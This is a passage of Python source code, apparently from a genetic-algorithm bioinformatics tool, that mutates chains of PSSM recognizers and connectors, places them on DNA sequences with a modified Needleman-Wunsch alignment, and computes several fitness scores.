connector_idx = recognizer_idx\n else:\n connector_idx = recognizer_idx - 1\n \n \t\t\t\t# recreate vector of recognizers and connectors\n \t\t\t\t# skipping the recgonizer/connector selected for deletion\n new_recognizers = (self.recognizers[:recognizer_idx] +\n self.recognizers[recognizer_idx + 1:])\n new_connectors = (self.connectors[:connector_idx] +\n self.connectors[connector_idx + 1:])\n \n \t\t\t\t# assign new vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \t\t\t# \"intelligent\" method: a new connector is created merging\n \t\t\t# the information of the right and left connectors for the\n \t\t\t# recognizer targeted for deletion\n if self.deletion_method == \"intelligent\":\n # Choose randomly the recognizer to be deleted\n recognizer_idx = random.randint(0, n_recognizers - 1)\n if recognizer_idx == 0:\n # If the recognizer to delete is the first, the connector to\n # delete is the one to the right\n # ( same index: connector_idx = recognizer_idx = 0 )\n connector_idx = recognizer_idx\n elif recognizer_idx == n_recognizers - 1:\n # If the recognizer to delete is the last, the connector to\n 
# delete is the one to the left\n # ( different index: connector_idx = recognizer_idx - 1 )\n connector_idx = recognizer_idx - 1\n else:\n # if the recognizer to delete is in not a terminal recognizer\n # of the chain, the parent connector to be deleted (left/right)\n # is chosen randomly\n if random.random() < 0.5:\n # Index of the parent connector that will be deleted\n connector_idx = recognizer_idx\n # Index of the parent connector that will be adjusted\n connector_to_stretch = recognizer_idx - 1\n else:\n # Index of the parent connector that will be deleted\n connector_idx = recognizer_idx - 1\n # Index of the parent connector that will be adjusted\n connector_to_stretch = recognizer_idx\n \n # Adjust parameters of the neighbour connector\n ''' The parent connector that is not deleted is modified,\n so that it can span the gap left by the deletion, without\n heavily affecting the placement of the nodes to the sides of\n the deletion point.'''\n \n # Adjust MU\n '''Thus, we need to add to the mu of the remaining connector\n also the mu of the deleted connector and the legth of the\n deleted recognizer.'''\n adj_mu = (self.connectors[connector_to_stretch]._mu +\n self.connectors[connector_idx]._mu +\n self.recognizers[recognizer_idx].length)\n \n # Adjust SIGMA\n ''' Variances are additive (under assumption of independence\n between the two random variables). Therefore to adjust the\n variance we need to add the variance of the deleted\n connector (the length of the deleted recognizer has no\n variance). Therefore, its standard deviation (sigma) becomes\n the square root of the sum of the squares of the sigmas.'''\n adj_sigma = (self.connectors[connector_to_stretch]._sigma ** 2 +\n self.connectors[connector_idx]._sigma ** 2)**(1/2)\n # set new mu and new sigma\n self.connectors[connector_to_stretch].set_mu(adj_mu)\n self.connectors[connector_to_stretch].set_sigma(adj_sigma)\n \n \t\t\t\t# recreate vector of recognizers and connectors\n \t\t\t\t# skipping the recgonizer/connector selected for deletion\t\t\t\t\t\n new_recognizers = (self.recognizers[:recognizer_idx] +\n self.recognizers[recognizer_idx + 1:])\n new_connectors = (self.connectors[:connector_idx] +\n self.connectors[connector_idx + 1:])\n \n \t\t\t\t# assign new vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \n \n # Insert a recognizer (and one parent connector)\n if random.random() < self.mutate_probability_insert_recognizer:\n \n\t\t\t# instantiate the new recognizer and connector\n new_connector = org_factory.create_connector()\n new_recognizer = org_factory.create_pssm()\n \n\t\t\t# \"blind\" method: one of the existing connectors is used\n\t\t\t# (unchanged) to connect to the new recognizer\n if self.insertion_method == \"blind\":\n \n n_recognizers = self.count_recognizers()\n # Choose randomly the recognizer next to which the insertion\n # is going to occur\n recognizer_idx = random.randint(0, n_recognizers - 1)\n # Choose randomly whether the insertion is going to be to the\n # left or to the right of the considered recognizer\n \n if random.random() < 0.5: # Insertion occurs to the left\n # First connector after insertion point and first\n # recognizer after insertion point\n connector_idx = recognizer_idx\n \n else: # Insertion occurs to the right\n # First connector after insertion point\n connector_idx = recognizer_idx\n # First recognizer after insertion point\n recognizer_idx += 1\n \n\t\t\t\t# recreate vector of connectors/recognizers, adding\n\t\t\t\t# the newly minted 
recognizer+connector\n new_recognizers = (self.recognizers[:recognizer_idx] +\n [new_recognizer] +\n self.recognizers[recognizer_idx:])\n new_connectors = (self.connectors[:connector_idx] +\n [new_connector] +\n self.connectors[connector_idx:])\n \n\t\t\t\t# assign new connector/recognizer vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n \n\t\t\t# \"intelligent\" method: the existing and new connector are\n\t\t\t# \"averaged\" so that their mu and sigma are \"equivalent\" to\n\t\t\t# to the connector previously occupying the position where\n\t\t\t# the new recognizer has been inserted\n if self.insertion_method == \"intelligent\":\n \n n_recognizers = self.count_recognizers()\n # Choose randomly the recognizer next to which the insertion\n # is going to occur\n recognizer_idx = random.randint(0, n_recognizers - 1)\n\t\t\t\t\n\t\t\t\t# set no compression as default (for terminal insertion cases)\n connector_to_compress = None\n\n\t\t\t\t# Choose randomly whether the insertion is going to be to the\n # left or to the right of the considered recognizer\n if random.random() < 0.5: # Insertion occurs to the left\n # First connector after insertion point and first\n # recognizer after insertion point\n connector_idx = recognizer_idx\n\n\t\t\t\t\t# if the new recognizer is NOT be the first in the chain\n if recognizer_idx != 0:\n connector_to_compress = recognizer_idx - 1\n # (No compression is required if insertion occurs to\n # the left of the first recognizer of the chain)\n \n else: # Insertion occurs to the right\n # First connector after insertion point\n connector_idx = recognizer_idx\n \n\t\t\t\t\t# if the new recognizer is NOT be the last in the chain\n if recognizer_idx != n_recognizers - 1:\n connector_to_compress = recognizer_idx\n # (No compression is required if insertion occurs to\n # the right of the last recognizer of the chain)\n \n # First recognizer after insertion point\n recognizer_idx += 1\n \n\t\t\t\t# if connector needs to be \"compressed\" (not a terminal insertion)\n if connector_to_compress != None:\n \n '''Ideally, we would like the sum of the mus of the two\n connectors (the old one and the inserted one) + the length\n of the inserted recognizer to be equal to the gap spanned\n by the old recognizer, so that the insertion doesn't heavily\n affect the placement of the nodes to the sides of the\n insertion point. So we need to scale down the mus and sigmas\n accordingly.'''\n \n # Adjust MUs\n ''' If the legth of the inserted recognizer alone is larger\n than the gap (i.e. larger than the mu of the already present\n connector) we can't reach the goal entirely and the best\n thing we can do is to keep the mus of the two connectors\n maximally shrinked. 
Otherwise, the mus of the connectors\n will be scaled so that their sum is equal to the gap (mu of\n the old connector) minus the length of the inserted\n recognizer.'''\n \n mu_old_connector = self.connectors[connector_to_compress]._mu\n mu_new_connector = new_connector._mu \n current_sum_mus = mu_old_connector + mu_new_connector\n expected_sum_mus = mu_old_connector - new_recognizer.length\n # If the inserted recognizer alone is larger than the gap\n if expected_sum_mus < 0:\n # best thing we can do is to maximally shrink mus\n expected_sum_mus = 0\n \n if current_sum_mus == 0: # To avoid 0/0 case\n mu_scaling_factor = 1\n else:\n mu_scaling_factor = expected_sum_mus / current_sum_mus\n # Compress the neighbour connector\n self.connectors[connector_to_compress].set_mu(\n mu_old_connector * mu_scaling_factor\n )\n # Compress the new inserted connector\n new_connector.set_mu(\n mu_new_connector * mu_scaling_factor\n )\n \n # Adjust SIGMAs\n ''' Variances are additive (under assumption of independence\n between the two random variables). Therefore, the overall\n variance will be the sum of the variances of the two\n connectors. The variances will be scaled so that their sum\n is equal to the variance of the connector that was already\n present before the insertion. The standard deviations,\n which are the square root of the variances, will be adjusted\n accordingly.'''\n var_old_connector = self.connectors[connector_to_compress]._sigma ** 2\n var_new_connector = new_connector._sigma**2\n current_sum_variances = var_old_connector + var_new_connector\n expected_sum_variances = var_old_connector\n \n if current_sum_variances == 0: # To avoid 0/0 case\n var_scaling_factor = 1\n else:\n var_scaling_factor = expected_sum_variances / current_sum_variances\n # Compress the neighbour connector\n self.connectors[connector_to_compress].set_sigma(\n np.sqrt(var_old_connector * var_scaling_factor)\n )\n # Compress the new inserted connector\n new_connector.set_sigma(\n np.sqrt(var_new_connector * var_scaling_factor)\n )\n \n\t\t\t\t# recreate vector of connectors/recognizers, adding\n\t\t\t\t# the newly minted recognizer+connector and containing\n\t\t\t\t# also the \"compressed\" existing connector\n new_recognizers = (self.recognizers[:recognizer_idx] +\n [new_recognizer] +\n self.recognizers[recognizer_idx:])\n new_connectors = (self.connectors[:connector_idx] +\n [new_connector] +\n self.connectors[connector_idx:])\n \n\t\t\t\t# assign new connector/recognizer vectors\n self.recognizers = new_recognizers\n self.connectors = new_connectors\n \n # Mutate nodes\n # If MUTATE_PROBABILITY_NODE_MUTATION is set to real value, a single\n # node is selected. 
If set to null, all nodes are mutated\n if self.mutate_probability_node_mutation:\n # Mutate a random node\n if random.random() < self.mutate_probability_node_mutation:\n \n n_nodes = self.count_nodes()\n random_node_idx = random.randint(0, n_nodes - 1)\n if random_node_idx < self.count_recognizers():\n # mutate a recognizer\n self.recognizers[random_node_idx].mutate(org_factory)\n else:\n # mutate a connector\n connector_idx = random_node_idx - self.count_recognizers()\n self.connectors[connector_idx].mutate(org_factory)\n else:\n for recognizer in self.recognizers:\n recognizer.mutate(org_factory)\n for connector in self.connectors:\n connector.mutate(org_factory)\n \n # no matter what mutation is applied, order/columns/number of pssm's\n # may have changed, so we call the set_row_to_pssm to set their mapping\n # on the alignment matrix anew\n self.set_row_to_pssm()\n \n def get_placement(self, dna_sequence, traceback=False, \n print_out = False, out_file = None) -> dict:\n \"\"\"Places the organism elements (recognizers and connectors) on a sequence\n\t\t in an optimal way, maximizing the energy (i.e. cumulative scores) obtained.\n\t\t \n\t\t That is, it returns the best possible placement of the organism on the\n\t\t sequence, as a function of the cumulative organism energy.\n\t\t \n\t\t Inputs:\n\t\t - dna_sequence: DNA sequence to place on\n\t\t - print_out: bool to indicate whether to print or not the placement\n - out_file: file handle to write placement to, if desired\n\t\t\n\t\t The placement function implements a modified Needleman-Wünch algorithm.\n\t\t \n\t\t The algorithm uses a two-dimensional matrix, with the sequence on the X-axis\n\t\t and the PSSM columns on the Y-axis.\n\t\t - Substitution scores are computed as PSSM column scores.\n\t\t - First row is set to zeros\n\t\t - First column is set to -inf\n\t\t - Gaps are only allowed in terminal PSSM rows (last column of PSSM)\n\t\t - Gaps can only take place between end of PSSM (cell) and another cell in row\n\t\t - Gaps are scored according to the score from the connector between the two\n\t\t PSSMs, provided with the distance (and its internal mu and sigma)\n\t\t - Contiguous (diagonal) PSSM alignment invokes a zero gap using the appropriate\n\t\t connector\n\t\t - The alignment matrix is (M+1)x(N+1)\n\t\t - The traceback matrix (which stores info for traceback) is 2 x (M+1)x(N+1).\n\t\t - The extra dimension captures the two coordinates for the traceback to cell\n\t\t - Traceback through a gap enforces that a diagonal move must be taken next\n\t\t (this avoids double gaps in a row)\n\t\t - Traceback is initiated at the cell with the best value on the bottom row\n\t\t\"\"\"\n \n # Initialize the two matrices (alignment + traceback matrices)\n \n # Number of rows\n m = self.sum_pssm_lengths()\n # Number of columns\n n = len(dna_sequence)\n \n # Initialize matrix of scores (alignment matrix)\n\t\t# Matrix is (M+1)x(N+1), with the extra \"fake\" row/columns\n\t\t# Matrix is initialized to -inf, then first row set to zero\n scores_matrix = np.full((m+1, n+1), -1 * np.inf)\n scores_matrix[0,:] = 0\n \n # Initialize matrix of pointers (traceback matrix), to None\n\t\t# Matrix is 2x(M+1)x(N+1), to store row/col of incoming cell\n pointers_matrix = np.full((2, m+1, n+1), None)\n \n # Fill the matrices (top-to-bottom, then left-to-right)\n for i in range(1, m + 1):\n\t\t\t# Row fill up is done in two passes:\n\t\t\t# - First fill up with possible diagonal scores\n\t\t\t# & (for terminal recognizer rows only)\n\t\t\t# - Fill up 
with possible gap scores (horizontal moves)\n\t\t\t\n # Diagonal scores over row i\n for j in range(1, n + 1):\n # call PSSM column score function with the DNA sequence\n diag_score = self.get_diag_score(pointers_matrix, i, j, dna_sequence)\n\t\t\t\t# assign cumulative score to alignment matrix\n scores_matrix[i,j] = scores_matrix[i-1, j-1] + diag_score\n # Annotate \"where we came from\" in the pointers_matrix\n pointers_matrix[0][i,j] = i - 1 # row idx of the origin\n pointers_matrix[1][i,j] = j - 1 # column idx of the origin\n \n # Horizontal scores over row i\n # (only in rows at the interface with the next PSSM)\n if self.is_last(i) and i != m:\n \n # Scores and pointers from horizontal moves are temporarily stored in\n # the following arrays. They will be written altogether at the end of\n # the loop over j, to avoid reading them as starting scores for other\n # horizontal moves at a later cycles in the for loop over j\n\t\t\t\t\n\t\t\t\t# That is, the matrix with diagonal scores is left untouched, and used\n\t\t\t\t# as reference for any gap evaluations. The result of such gap evaluations\n\t\t\t\t# is placed on a temporary matrix. The best gap scores are computed there.\n\t\t\t\t# This is to avoid adding the gap-to-gap score (instead of\n\t\t\t\t# the diagonal score) that has replaced a diagonal score, as we move\n\t\t\t\t# further right (because otherwise you could \"carry\" multiple gap\n\t\t\t\t# scores\n tmp_gap_scores = scores_matrix[i,:].copy() # vector of length n+1\n tmp_gap_pointers = pointers_matrix[:,i,:].copy() # 2 x (n+1) matrix\n \n\t\t\t\t# for each column of the matrix\n for j in range(1, n + 1):\n # Compute all the possible values from all the possible\n # horizontal moves (gaps) that land on [i,j]\n for start in range(j):\n gap_size = j - start\t# obtain distance for connector\n\t\t\t\t\t\t# obtain PSSM index, which is also the connector index\n\t\t\t\t\t\t# because this is the preceding PSSM\n pssm_idx = self.row_to_pssm[i][0]\n\t\t\t\t\t\t# evaluate the score for connector given distance\n\t\t\t\t\t\t# the DNA sequence length (n) is needed for the connector\n\t\t\t\t\t\t# background model\n gap_score = self.get_gap_score(pssm_idx, gap_size, n)\n\t\t\t\t\t\t# add cumulative score (using the score matrix, which has\n\t\t\t\t\t\t# not been modified by horizontal scores)\n candidate_score = scores_matrix[i, start] + gap_score\n \n\t\t\t\t\t\t# assess whether temp scores should be overwritten\n\t\t\t\t\t\t# that is, whether this gap is better than other gaps\n if candidate_score >= tmp_gap_scores[j]:\n # Write horizontal score if better than existing\n tmp_gap_scores[j] = candidate_score\n # Annotate \"where we came from\" in the tmp_gap_pointers\n tmp_gap_pointers[0,j] = i # row idx of the origin\n tmp_gap_pointers[1,j] = start # column idx of the origin\n \n \n # Update the original matrices\n\t\t\t\t# tmp_gap_scores contains the updated matrix, with the diagnonal moves\n\t\t\t\t# and any best horizontal moves replacing them if adequate\n scores_matrix[i,:] = tmp_gap_scores\n pointers_matrix[:,i,:] = tmp_gap_pointers\n \n # Get best binding energy (max value on bottom row)\n last_row = scores_matrix[-1,:]\n best = max(last_row)\n \n # BACKTRACKING\n if traceback or print_out or out_file != None:\n # Position of best (where backtracking starts from)\n best_i = m # it always comes from the last row by definition\n # if multiple positions in last row have best value, pick first\n # to initiate traceback\n best_j = int(np.where(last_row == best)[0][0]) # column of best 
value\n \n # Traverse back the matrix from the best element in the last row\n # and store the alignment path\n \t\t# traverse_matrix is a recursive function that will generate the path\n \t\t# taken by the optimal alignment\n alignment_path = []\n alignment_path = self.traverse_matrix(pointers_matrix, best_i, best_j, alignment_path)\n alignment_path.reverse() # Top-down instead of bottom-up\n \n # Get scores and positions of all the nodes of the organism\n node_scores, node_positions, cols_of_0_gaps = self.get_node_positions_and_energies(\n alignment_path, scores_matrix, pointers_matrix, dna_sequence\n )\n \n # Print placement\n if print_out == True:\n self.print_placement(node_positions, node_scores,\n cols_of_0_gaps, dna_sequence, \n print_out=True)\n # Print to file\n if out_file != None:\n self.print_placement(node_positions, node_scores,\n cols_of_0_gaps, dna_sequence, \n print_out=False, out_file=out_file)\n\n # Split node-scores into recognizers-scores and connectors-scores\n # Remove token node [first row is treated as a node, to provide\n # a start position for the following recognizer, by tracking its\n # end]\n node_scores = node_scores[1:] \n recognizers_scores = []\n connectors_scores = []\n for i in range(len(node_scores)):\n if i % 2 == 0:\n recognizers_scores.append(node_scores[i])\n else:\n connectors_scores.append(node_scores[i])\n # if no backtracking, return empty lists for recognizer_scores and\n # connector_scores\n else:\n recognizers_scores = []\n connectors_scores = [] \n \n # Return output dictionary\n output_dict = {\"energy\": best,\n \"recognizers_scores\": recognizers_scores,\n \"connectors_scores\": connectors_scores}\n \n return output_dict\n\n def get_seq_fitness(self, s_dna: str, traceback=False, print_out = False) -> dict:\n \"\"\"Return the fitness of the organism for a given DNA sequence\n\n Args:\n s_dna: DNA sequence to analize\n\n Returns:\n score, blocked and blockers\n\n Description:\n This function implements the placement behavior for organism.\n The placement problem is defined as who to best position an\n organism on a sequence (i.e. 
how to maximize its fitness given\n \"\"\"\n #invoke placement function\n placed_org=self.get_placement(s_dna, traceback, print_out)\n \n # Set energy threshold method and value\n E_threshold_method = self.energy_threshold_method\n E_threshold_value = self.energy_threshold_value\n \n # Apply lower bound to energy if required\n if E_threshold_method == \"organism\":\n if placed_org[\"energy\"] < E_threshold_value:\n placed_org[\"energy\"] = E_threshold_value\n \n # return score, blocks and blockers and PSSMs scores in that sequence\n return placed_org\n \n \n def get_additive_fitness(self, a_dna: list, traceback=False, \n print_out = False, use_gini=False) -> dict:\n \"\"\"Return the total Fitness for an array of DNA sequences and the\n chosen fitness method\n\n Args:\n a_dna: list of dna sequences\n\n Returns:\n average/sum of the energy of the organism on each sequence\n\t\t\taverage of the gini coefficient of the organism's recognizers on each sequence\n \"\"\"\n\n scores = []\n ginis = []\n\t\t# for each sequence in the provided sequence set\n for s_dna in a_dna:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else:\n sfit = self.get_seq_fitness(s_dna)\n energy = sfit[\"energy\"] # energy\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini) \n\t\t\t\n\t\t\t# append energy\n scores.append(energy)\n \n score_stdev = np.std(scores)\n if self.cumulative_fit_method == \"sum\":\n # Compute fitness score as sum over the positive scores\n score = np.sum(scores)\n \n elif self.cumulative_fit_method == \"mean\":\n # Compute fitness score as average positive score\n score = np.mean(scores)\n \n elif self.cumulative_fit_method == \"median\":\n # Compute fitness score as median positive score\n score = np.median(scores)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no gini is requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n return {\"score\": score, \"stdev\" : score_stdev, \"avg_gini\": avg_gini}\n \n def get_binding_energies(self, a_dna: list, traceback=False, \n print_out = False, use_gini=False) -> list:\n \"\"\"Return the binding energies for an array of DNA sequences.\n\n Args:\n a_dna: list of dna sequences\n\n Returns:\n list of binding eneregies\n \"\"\"\n\n scores = []\n\t\t# for each sequence in the provided sequence set\n for s_dna in a_dna:\n sfit = self.get_seq_fitness(s_dna)\n energy = sfit[\"energy\"]\n scores.append(energy)\n \n return scores\n\n def get_kolmogorov_fitness(self, pos_dataset: list, neg_dataset: list,\n traceback=False, print_out = False, \n use_gini=False) -> float:\n \"\"\"Returns the organism's fitness, defined as the Kolmogorov-Smirnov\n test statistic. 
This is bounded in [0,1].\n Test null assumes the samples are drawn from the same (continuous)\n distribution.\n The statistic is sensitive to differences in both location and shape \n of the empirical cumulative distribution functions of the two samples.\n Args:\n pos_dataset: list of dna sequences in the positive dataset\n neg_dataset: list of dna sequences in the negative dataset\n Returns:\n fitness assigned to the organism\n \"\"\" \n # Values on the positive set\n pos_values = []\n ginis = []\n for s_dna in pos_dataset:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else: \n sfit = self.get_seq_fitness(s_dna)\n \n pos_values.append(sfit[\"energy\"]) # get sequence energy score\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no Gini was requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n # Values on the negative set\n neg_values = []\n for s_dna in neg_dataset:\n sfit = self.get_seq_fitness(s_dna)\n neg_values.append(sfit[\"energy\"]) # get sequence energy score\n \n # Compute fitness score as a Boltzmannian probability\n kolmogorov_fitness = ks_2samp(pos_values, neg_values).statistic\n \n return {\"score\": kolmogorov_fitness, \"avg_gini\": avg_gini} \n \n def get_boltz_fitness(self, pos_dataset: list, neg_dataset: list,\n genome_length: int, traceback=False, \n print_out = False, use_gini=False) -> float:\n \"\"\"Returns the organism's fitness, defined as the probability that the regulator binds a\n positive sequence. All the binding energies are turned into probabilities according to a\n Boltzmannian distribution. 
The probability of binding a particular sequence, given the binding\n energy on that sequence, is p = e**binding_energy / Z\n where Z is the partition function.\n A high number of negative sequences is assumed to be present (emulating the environment of a\n regulator that needs to find its targets on an entire genome).\n A coefficient called neg_factor is computed, so that the value of Z can be as high as if there\n were as\tmany negative sequences as required to cover the entire genome.\n\n Args:\n pos_dataset: list of dna sequences in the positive dataset\n neg_dataset: list of dna sequences in the negative dataset\n genome_length: integer representing the length of the genome\n\n Returns:\n fitness assigned to the organism\n \"\"\"\n \n # Values on the positive set\n pos_values = []\n ginis = []\n for s_dna in pos_dataset:\n #do traceback only if Gini is requested\n if use_gini:\n \t\t\t# get the energy and pssm scores\n sfit = self.get_seq_fitness(s_dna, traceback=True)\n else: \n sfit = self.get_seq_fitness(s_dna)\n boltz_exp = np.e**sfit[\"energy\"] # exp(energy)\n pssm_scores = sfit[\"recognizers_scores\"] # PSSMs scores\n if use_gini:\n \t\t\t# compute and append the Gini coefficient\n if len(pssm_scores) > 0:\n gini = gini_RSV(pssm_scores) # Gini coefficient\n ginis.append(gini)\n\n pos_values.append(boltz_exp)\n \n # Compute the average Gini coefficient as the geometric mean\n if len(ginis) == 0: # Case where no Gini was requested\n avg_gini = 0 # minimum penalty is arbitrarily assigned\n else:\n avg_gini = np.prod(ginis) ** (1/len(ginis)) # geometric mean\n \n # Values on the negative set\n neg_values = []\n neg_lengths = []\n for s_dna in neg_dataset:\n sfit = self.get_seq_fitness(s_dna)\n boltz_exp = np.e**sfit[\"energy\"] # exp(energy)\n neg_values.append(boltz_exp)\n neg_lengths.append(len(s_dna))\n \n # Scaling factor, used to over-represent the negative scores, so that\n # it simulates a genome of specified length\n neg_factor = genome_length//sum(neg_lengths)\n \n # Partition function\n Z = sum(pos_values) + neg_factor * sum(neg_values)\n \n # Compute fitness score as a Boltzmannian probability\n boltz_fitness = sum(pos_values) / Z\n \n return {\"score\": boltz_fitness, \"avg_gini\": avg_gini}\n\n def count_nodes(self) -> int:\n \"\"\"Returns the number of nodes of the organism\n\n Returns:\n Number of nodes of the organism\n \"\"\"\n\n return 2 * len(self.recognizers) - 1\n \n def count_connectors(self) -> int:\n \"\"\"Returns the number of connectors of the organism\n\n Returns:\n Number of connectors.\n \"\"\"\n \n return len(self.connectors)\n\n def count_recognizers(self) -> int:\n \"\"\"Returns the number of recognizers of the organism\n\n Returns:\n Number of recognizers.\n \"\"\"\n \n return len(self.recognizers)\n \n def sum_pssm_lengths(self) -> int:\n \"\"\"Returns the sum of the lengths of all the PSSMs of the organism.\n \"\"\"\n \n sum_lengths = 0\n for pssm in self.recognizers:\n sum_lengths += pssm.length\n \n return sum_lengths\n \n def get_gap_score(self, connector_idx, d, s_dna_len):\n \"\"\"Calls the appropriate connector, with the given distance and length of the DNA sequence to\n\t\t obtain the energy of the connector.\n\t\t\"\"\"\n if d == s_dna_len:\n return -1 * np.inf\n \n gap_score = self.connectors[connector_idx].get_score(d, s_dna_len)\n return gap_score\n \n def get_score_from_pssm(self, row_idx_from_placement_matrix, nucleotide):\n \"\"\"Calls the appropriate PSSM (and column) to obtain the score, given a nucleotide\n\t\t\"\"\"\n pssm_index 
= self.row_to_pssm[row_idx_from_placement_matrix][0]\n pssm_column = self.row_to_pssm[row_idx_from_placement_matrix][1]\n pssm_object = self.recognizers[pssm_index]\n score = pssm_object.pssm[pssm_column][nucleotide]\n return score\n \n def get_diag_score(self, pointers_mat, row_idx, col_idx, dna_sequence):\n \"\"\"Evaluates and returns a substitution score (diagonal move), using\n\t\t get_score_from_pssm and taking into account several special cases.\n\t\t row_idx and col_idx identify the \"destination\" cell [the cell being\n\t\t evaluated]\n\t\t\"\"\"\n \n diag_score = 0\n \n # Check if it is a gap of zero bp\n\t\t# This means two PSSMs back to back, which then must incorporate a zero\n\t\t# gap score\n if self.is_a_0_bp_gap(pointers_mat, row_idx, col_idx):\n # Call connector, for a zero bp gap evaluation, add it to the\n\t\t\t# diagonal score [connector needs to the length of the DNA seq]\n pssm_idx = self.row_to_pssm[row_idx][0]\n connector = self.connectors[pssm_idx - 1]\n zero_gap_score = connector.get_score(0, len(dna_sequence))\n diag_score += zero_gap_score\n \n\t\t# get nucleotide and compute PSSM score for it\n nucleotide = dna_sequence[col_idx - 1] \n pssm_score = self.get_score_from_pssm(row_idx, nucleotide)\n diag_score += pssm_score\n \n return diag_score\n \n def is_first(self, row_idx_from_placement_matrix):\n \"\"\"Returns true if we are on the first element of a PSSM recognizer\n\t\t\"\"\"\n pssm_col = self.row_to_pssm[row_idx_from_placement_matrix][1]\n if pssm_col == 0:\n return True\n else:\n return False\n \n def is_last(self, row_idx_from_placement_matrix): \n \"\"\"Returns true if we are on the last element of a PSSM recognizer\n\t\t\"\"\"\n\t\t# if next one is a first, then we are at a last ;-)\n if self.is_first(row_idx_from_placement_matrix + 1):\n return True\n else:\n return False\n \n def is_a_0_bp_gap(self, pointers_mat, row_idx, col_idx):\n \"\"\"Tells whether the cell defines a contiguous diagonal\n\t\t run between two PSSMs\n\t\t\"\"\"\n\n\t\t# if the row does not correspond to the first column of a PSSM\n if self.is_first(row_idx)==False:\n return False\n \n\t\t# if the row IS a first column of a PSSM\n\t\t# get row index of diagonal-up-left cell\n\t\t# this should be the row of the cell pointing to the\n\t\t# end of the previous PSSM\n pointer_row_idx = pointers_mat[0][row_idx-1, col_idx-1]\n \n\t\t# the equality below, will only be true, if there was\n\t\t# a diagonal move. 
this, combined with the fact that we know\n\t\t# that this was a PSSM last row, identifies that the diagonal\n\t\t# up-left element comes from a PSSM diagonal score\n\t\t# (so you really have a back-to-back PSSM situation)\n if pointer_row_idx == row_idx-2:\n return True\n else:\n return False\n \n def traverse_matrix(self, pointers_mat, i, j,\n alignment_path=[], from_gap_flag=False) -> list:\n \"\"\"Recursive function used for traceback\n\t\t - i and j are the starting positions\n\t\t - alignment_path is the path that is filled up recursively\n\t\t - from_gap_flag identifies the case that we got to this position from a gap\n\t\t and we therefore MUST go diagonal (no gap concatenation is allowed)\n\t\t\"\"\"\n \n # End of the recursion\n if i == None: # the top row has been reached\n return alignment_path\n \n\t\t# add current cell coordinates to path\n alignment_path.append([i,j])\n \n\t\t# avoid double gaps\n if from_gap_flag == True:\n # move diagonally\n i_next = i - 1\n j_next = j - 1\n\t # or move back through annotated pointer\n else:\n # move where the pointers-matrix says\n i_next = pointers_mat[0, i, j]\n j_next = pointers_mat[1, i, j]\n \n\t\t# if moving horizontally, indicate that with flag\n if i_next == i:\n return self.traverse_matrix(pointers_mat, i_next, j_next,\n alignment_path, from_gap_flag=True)\n else:\n return self.traverse_matrix(pointers_mat, i_next, j_next,\n alignment_path,from_gap_flag=False)\n\n \n def get_node_positions_and_energies(self, alignment_path, scores_matrix,\n pointers_matrix, dna_seq) -> list:\n \"\"\"Takes the alignment path and the completed score and pointer matrices.\n Returns a list that contains:\n - node_scores: score of recognizer/connector node\n - node_placements_right_ends: column of matrix where placement of node ends\n - columns_of_0_bp_gaps: column with special contiguous recognizer case\n \n The alignment path is already reversed, so first element is top-left.\n \n Function goes through the alignment path and reports where each node\n ends (column in alingment matrix)\n\t\t\"\"\"\n \n # Use the path to get info about individual positions and score of all the\n # nodes of the organism\n \n node_scores = []\n previous_score = 0\n node_placements_right_ends = []\n previous_element = [None, None]\n columns_of_0_bp_gaps = []\n \n # for each element of the alignment path\n for element in alignment_path:\n row, column = element\n \n # if we are on a row where gaps are allowed (PSSM ends or connector)\n if self.is_last(row):\n \n # if we just landed on this row via a diagonal move, then \n # this is a PSSM end\n if previous_element[0] == row - 1:\n # The PSSM score needs to be recomputed (it could have been\n # over-written by a gap-score)\n \n score = self.get_diag_score(pointers_matrix, row,\n column, dna_seq)\n cumulative_score = scores_matrix[row-1, column-1] + score\n \n # this was a gap, so no need to recompute score\n else:\n cumulative_score = scores_matrix[row, column]\n \n # compute the node score, by substracting from cumulative\n node_score = cumulative_score - previous_score\n node_scores.append(node_score)\n previous_score = cumulative_score\n \n # mark its last position on matrix (right end)\n node_placements_right_ends.append(column)\n \n # if we are on the first position of a new pssm which is adjacent to\n # the previous one (gap of 0 bp), the cumulative score we read also\n # contains the score of the first position of the PSSM (not only the\n # connector score)\n if self.is_a_0_bp_gap(pointers_matrix, row, column):\n \n 
\n nucleotide = dna_seq[column - 1] \n pssm_contribution = self.get_score_from_pssm(row, nucleotide)\n \n \n cell_score = scores_matrix[row, column]\n # Remove the pssm contribution, so that the cumulative score\n # doesn't include the first position of the next PSSM, but only the\n # contribution from the connector\n cumulative_score = cell_score - pssm_contribution\n node_score = cumulative_score - previous_score\n node_scores.append(node_score)\n previous_score = cumulative_score\n \n node_placements_right_ends.append(column)\n \n columns_of_0_bp_gaps.append(column)\n \n \n previous_element = [row, column]\n \n \n return [node_scores, node_placements_right_ends, columns_of_0_bp_gaps]\n \n def print_placement(self, node_right_ends, node_scores,\n cols_of_0_gaps, dna_seq, \n print_out = True, out_file = None):\n \"\"\"For a dna_seq, it prints out the placement of the node on text or file.\n \n Gets:\n - node_right_ends: last position [col] of nodes in alignment matrix\n - node_scores: scores of nodes\n \n In the alignment matrix we have an extra column (-infs).\n We also have an extra row, which we are modeling as a \"virtual\" node,\n with its associated \"right_end\".\n Once we remove the extra column, the position of the previous 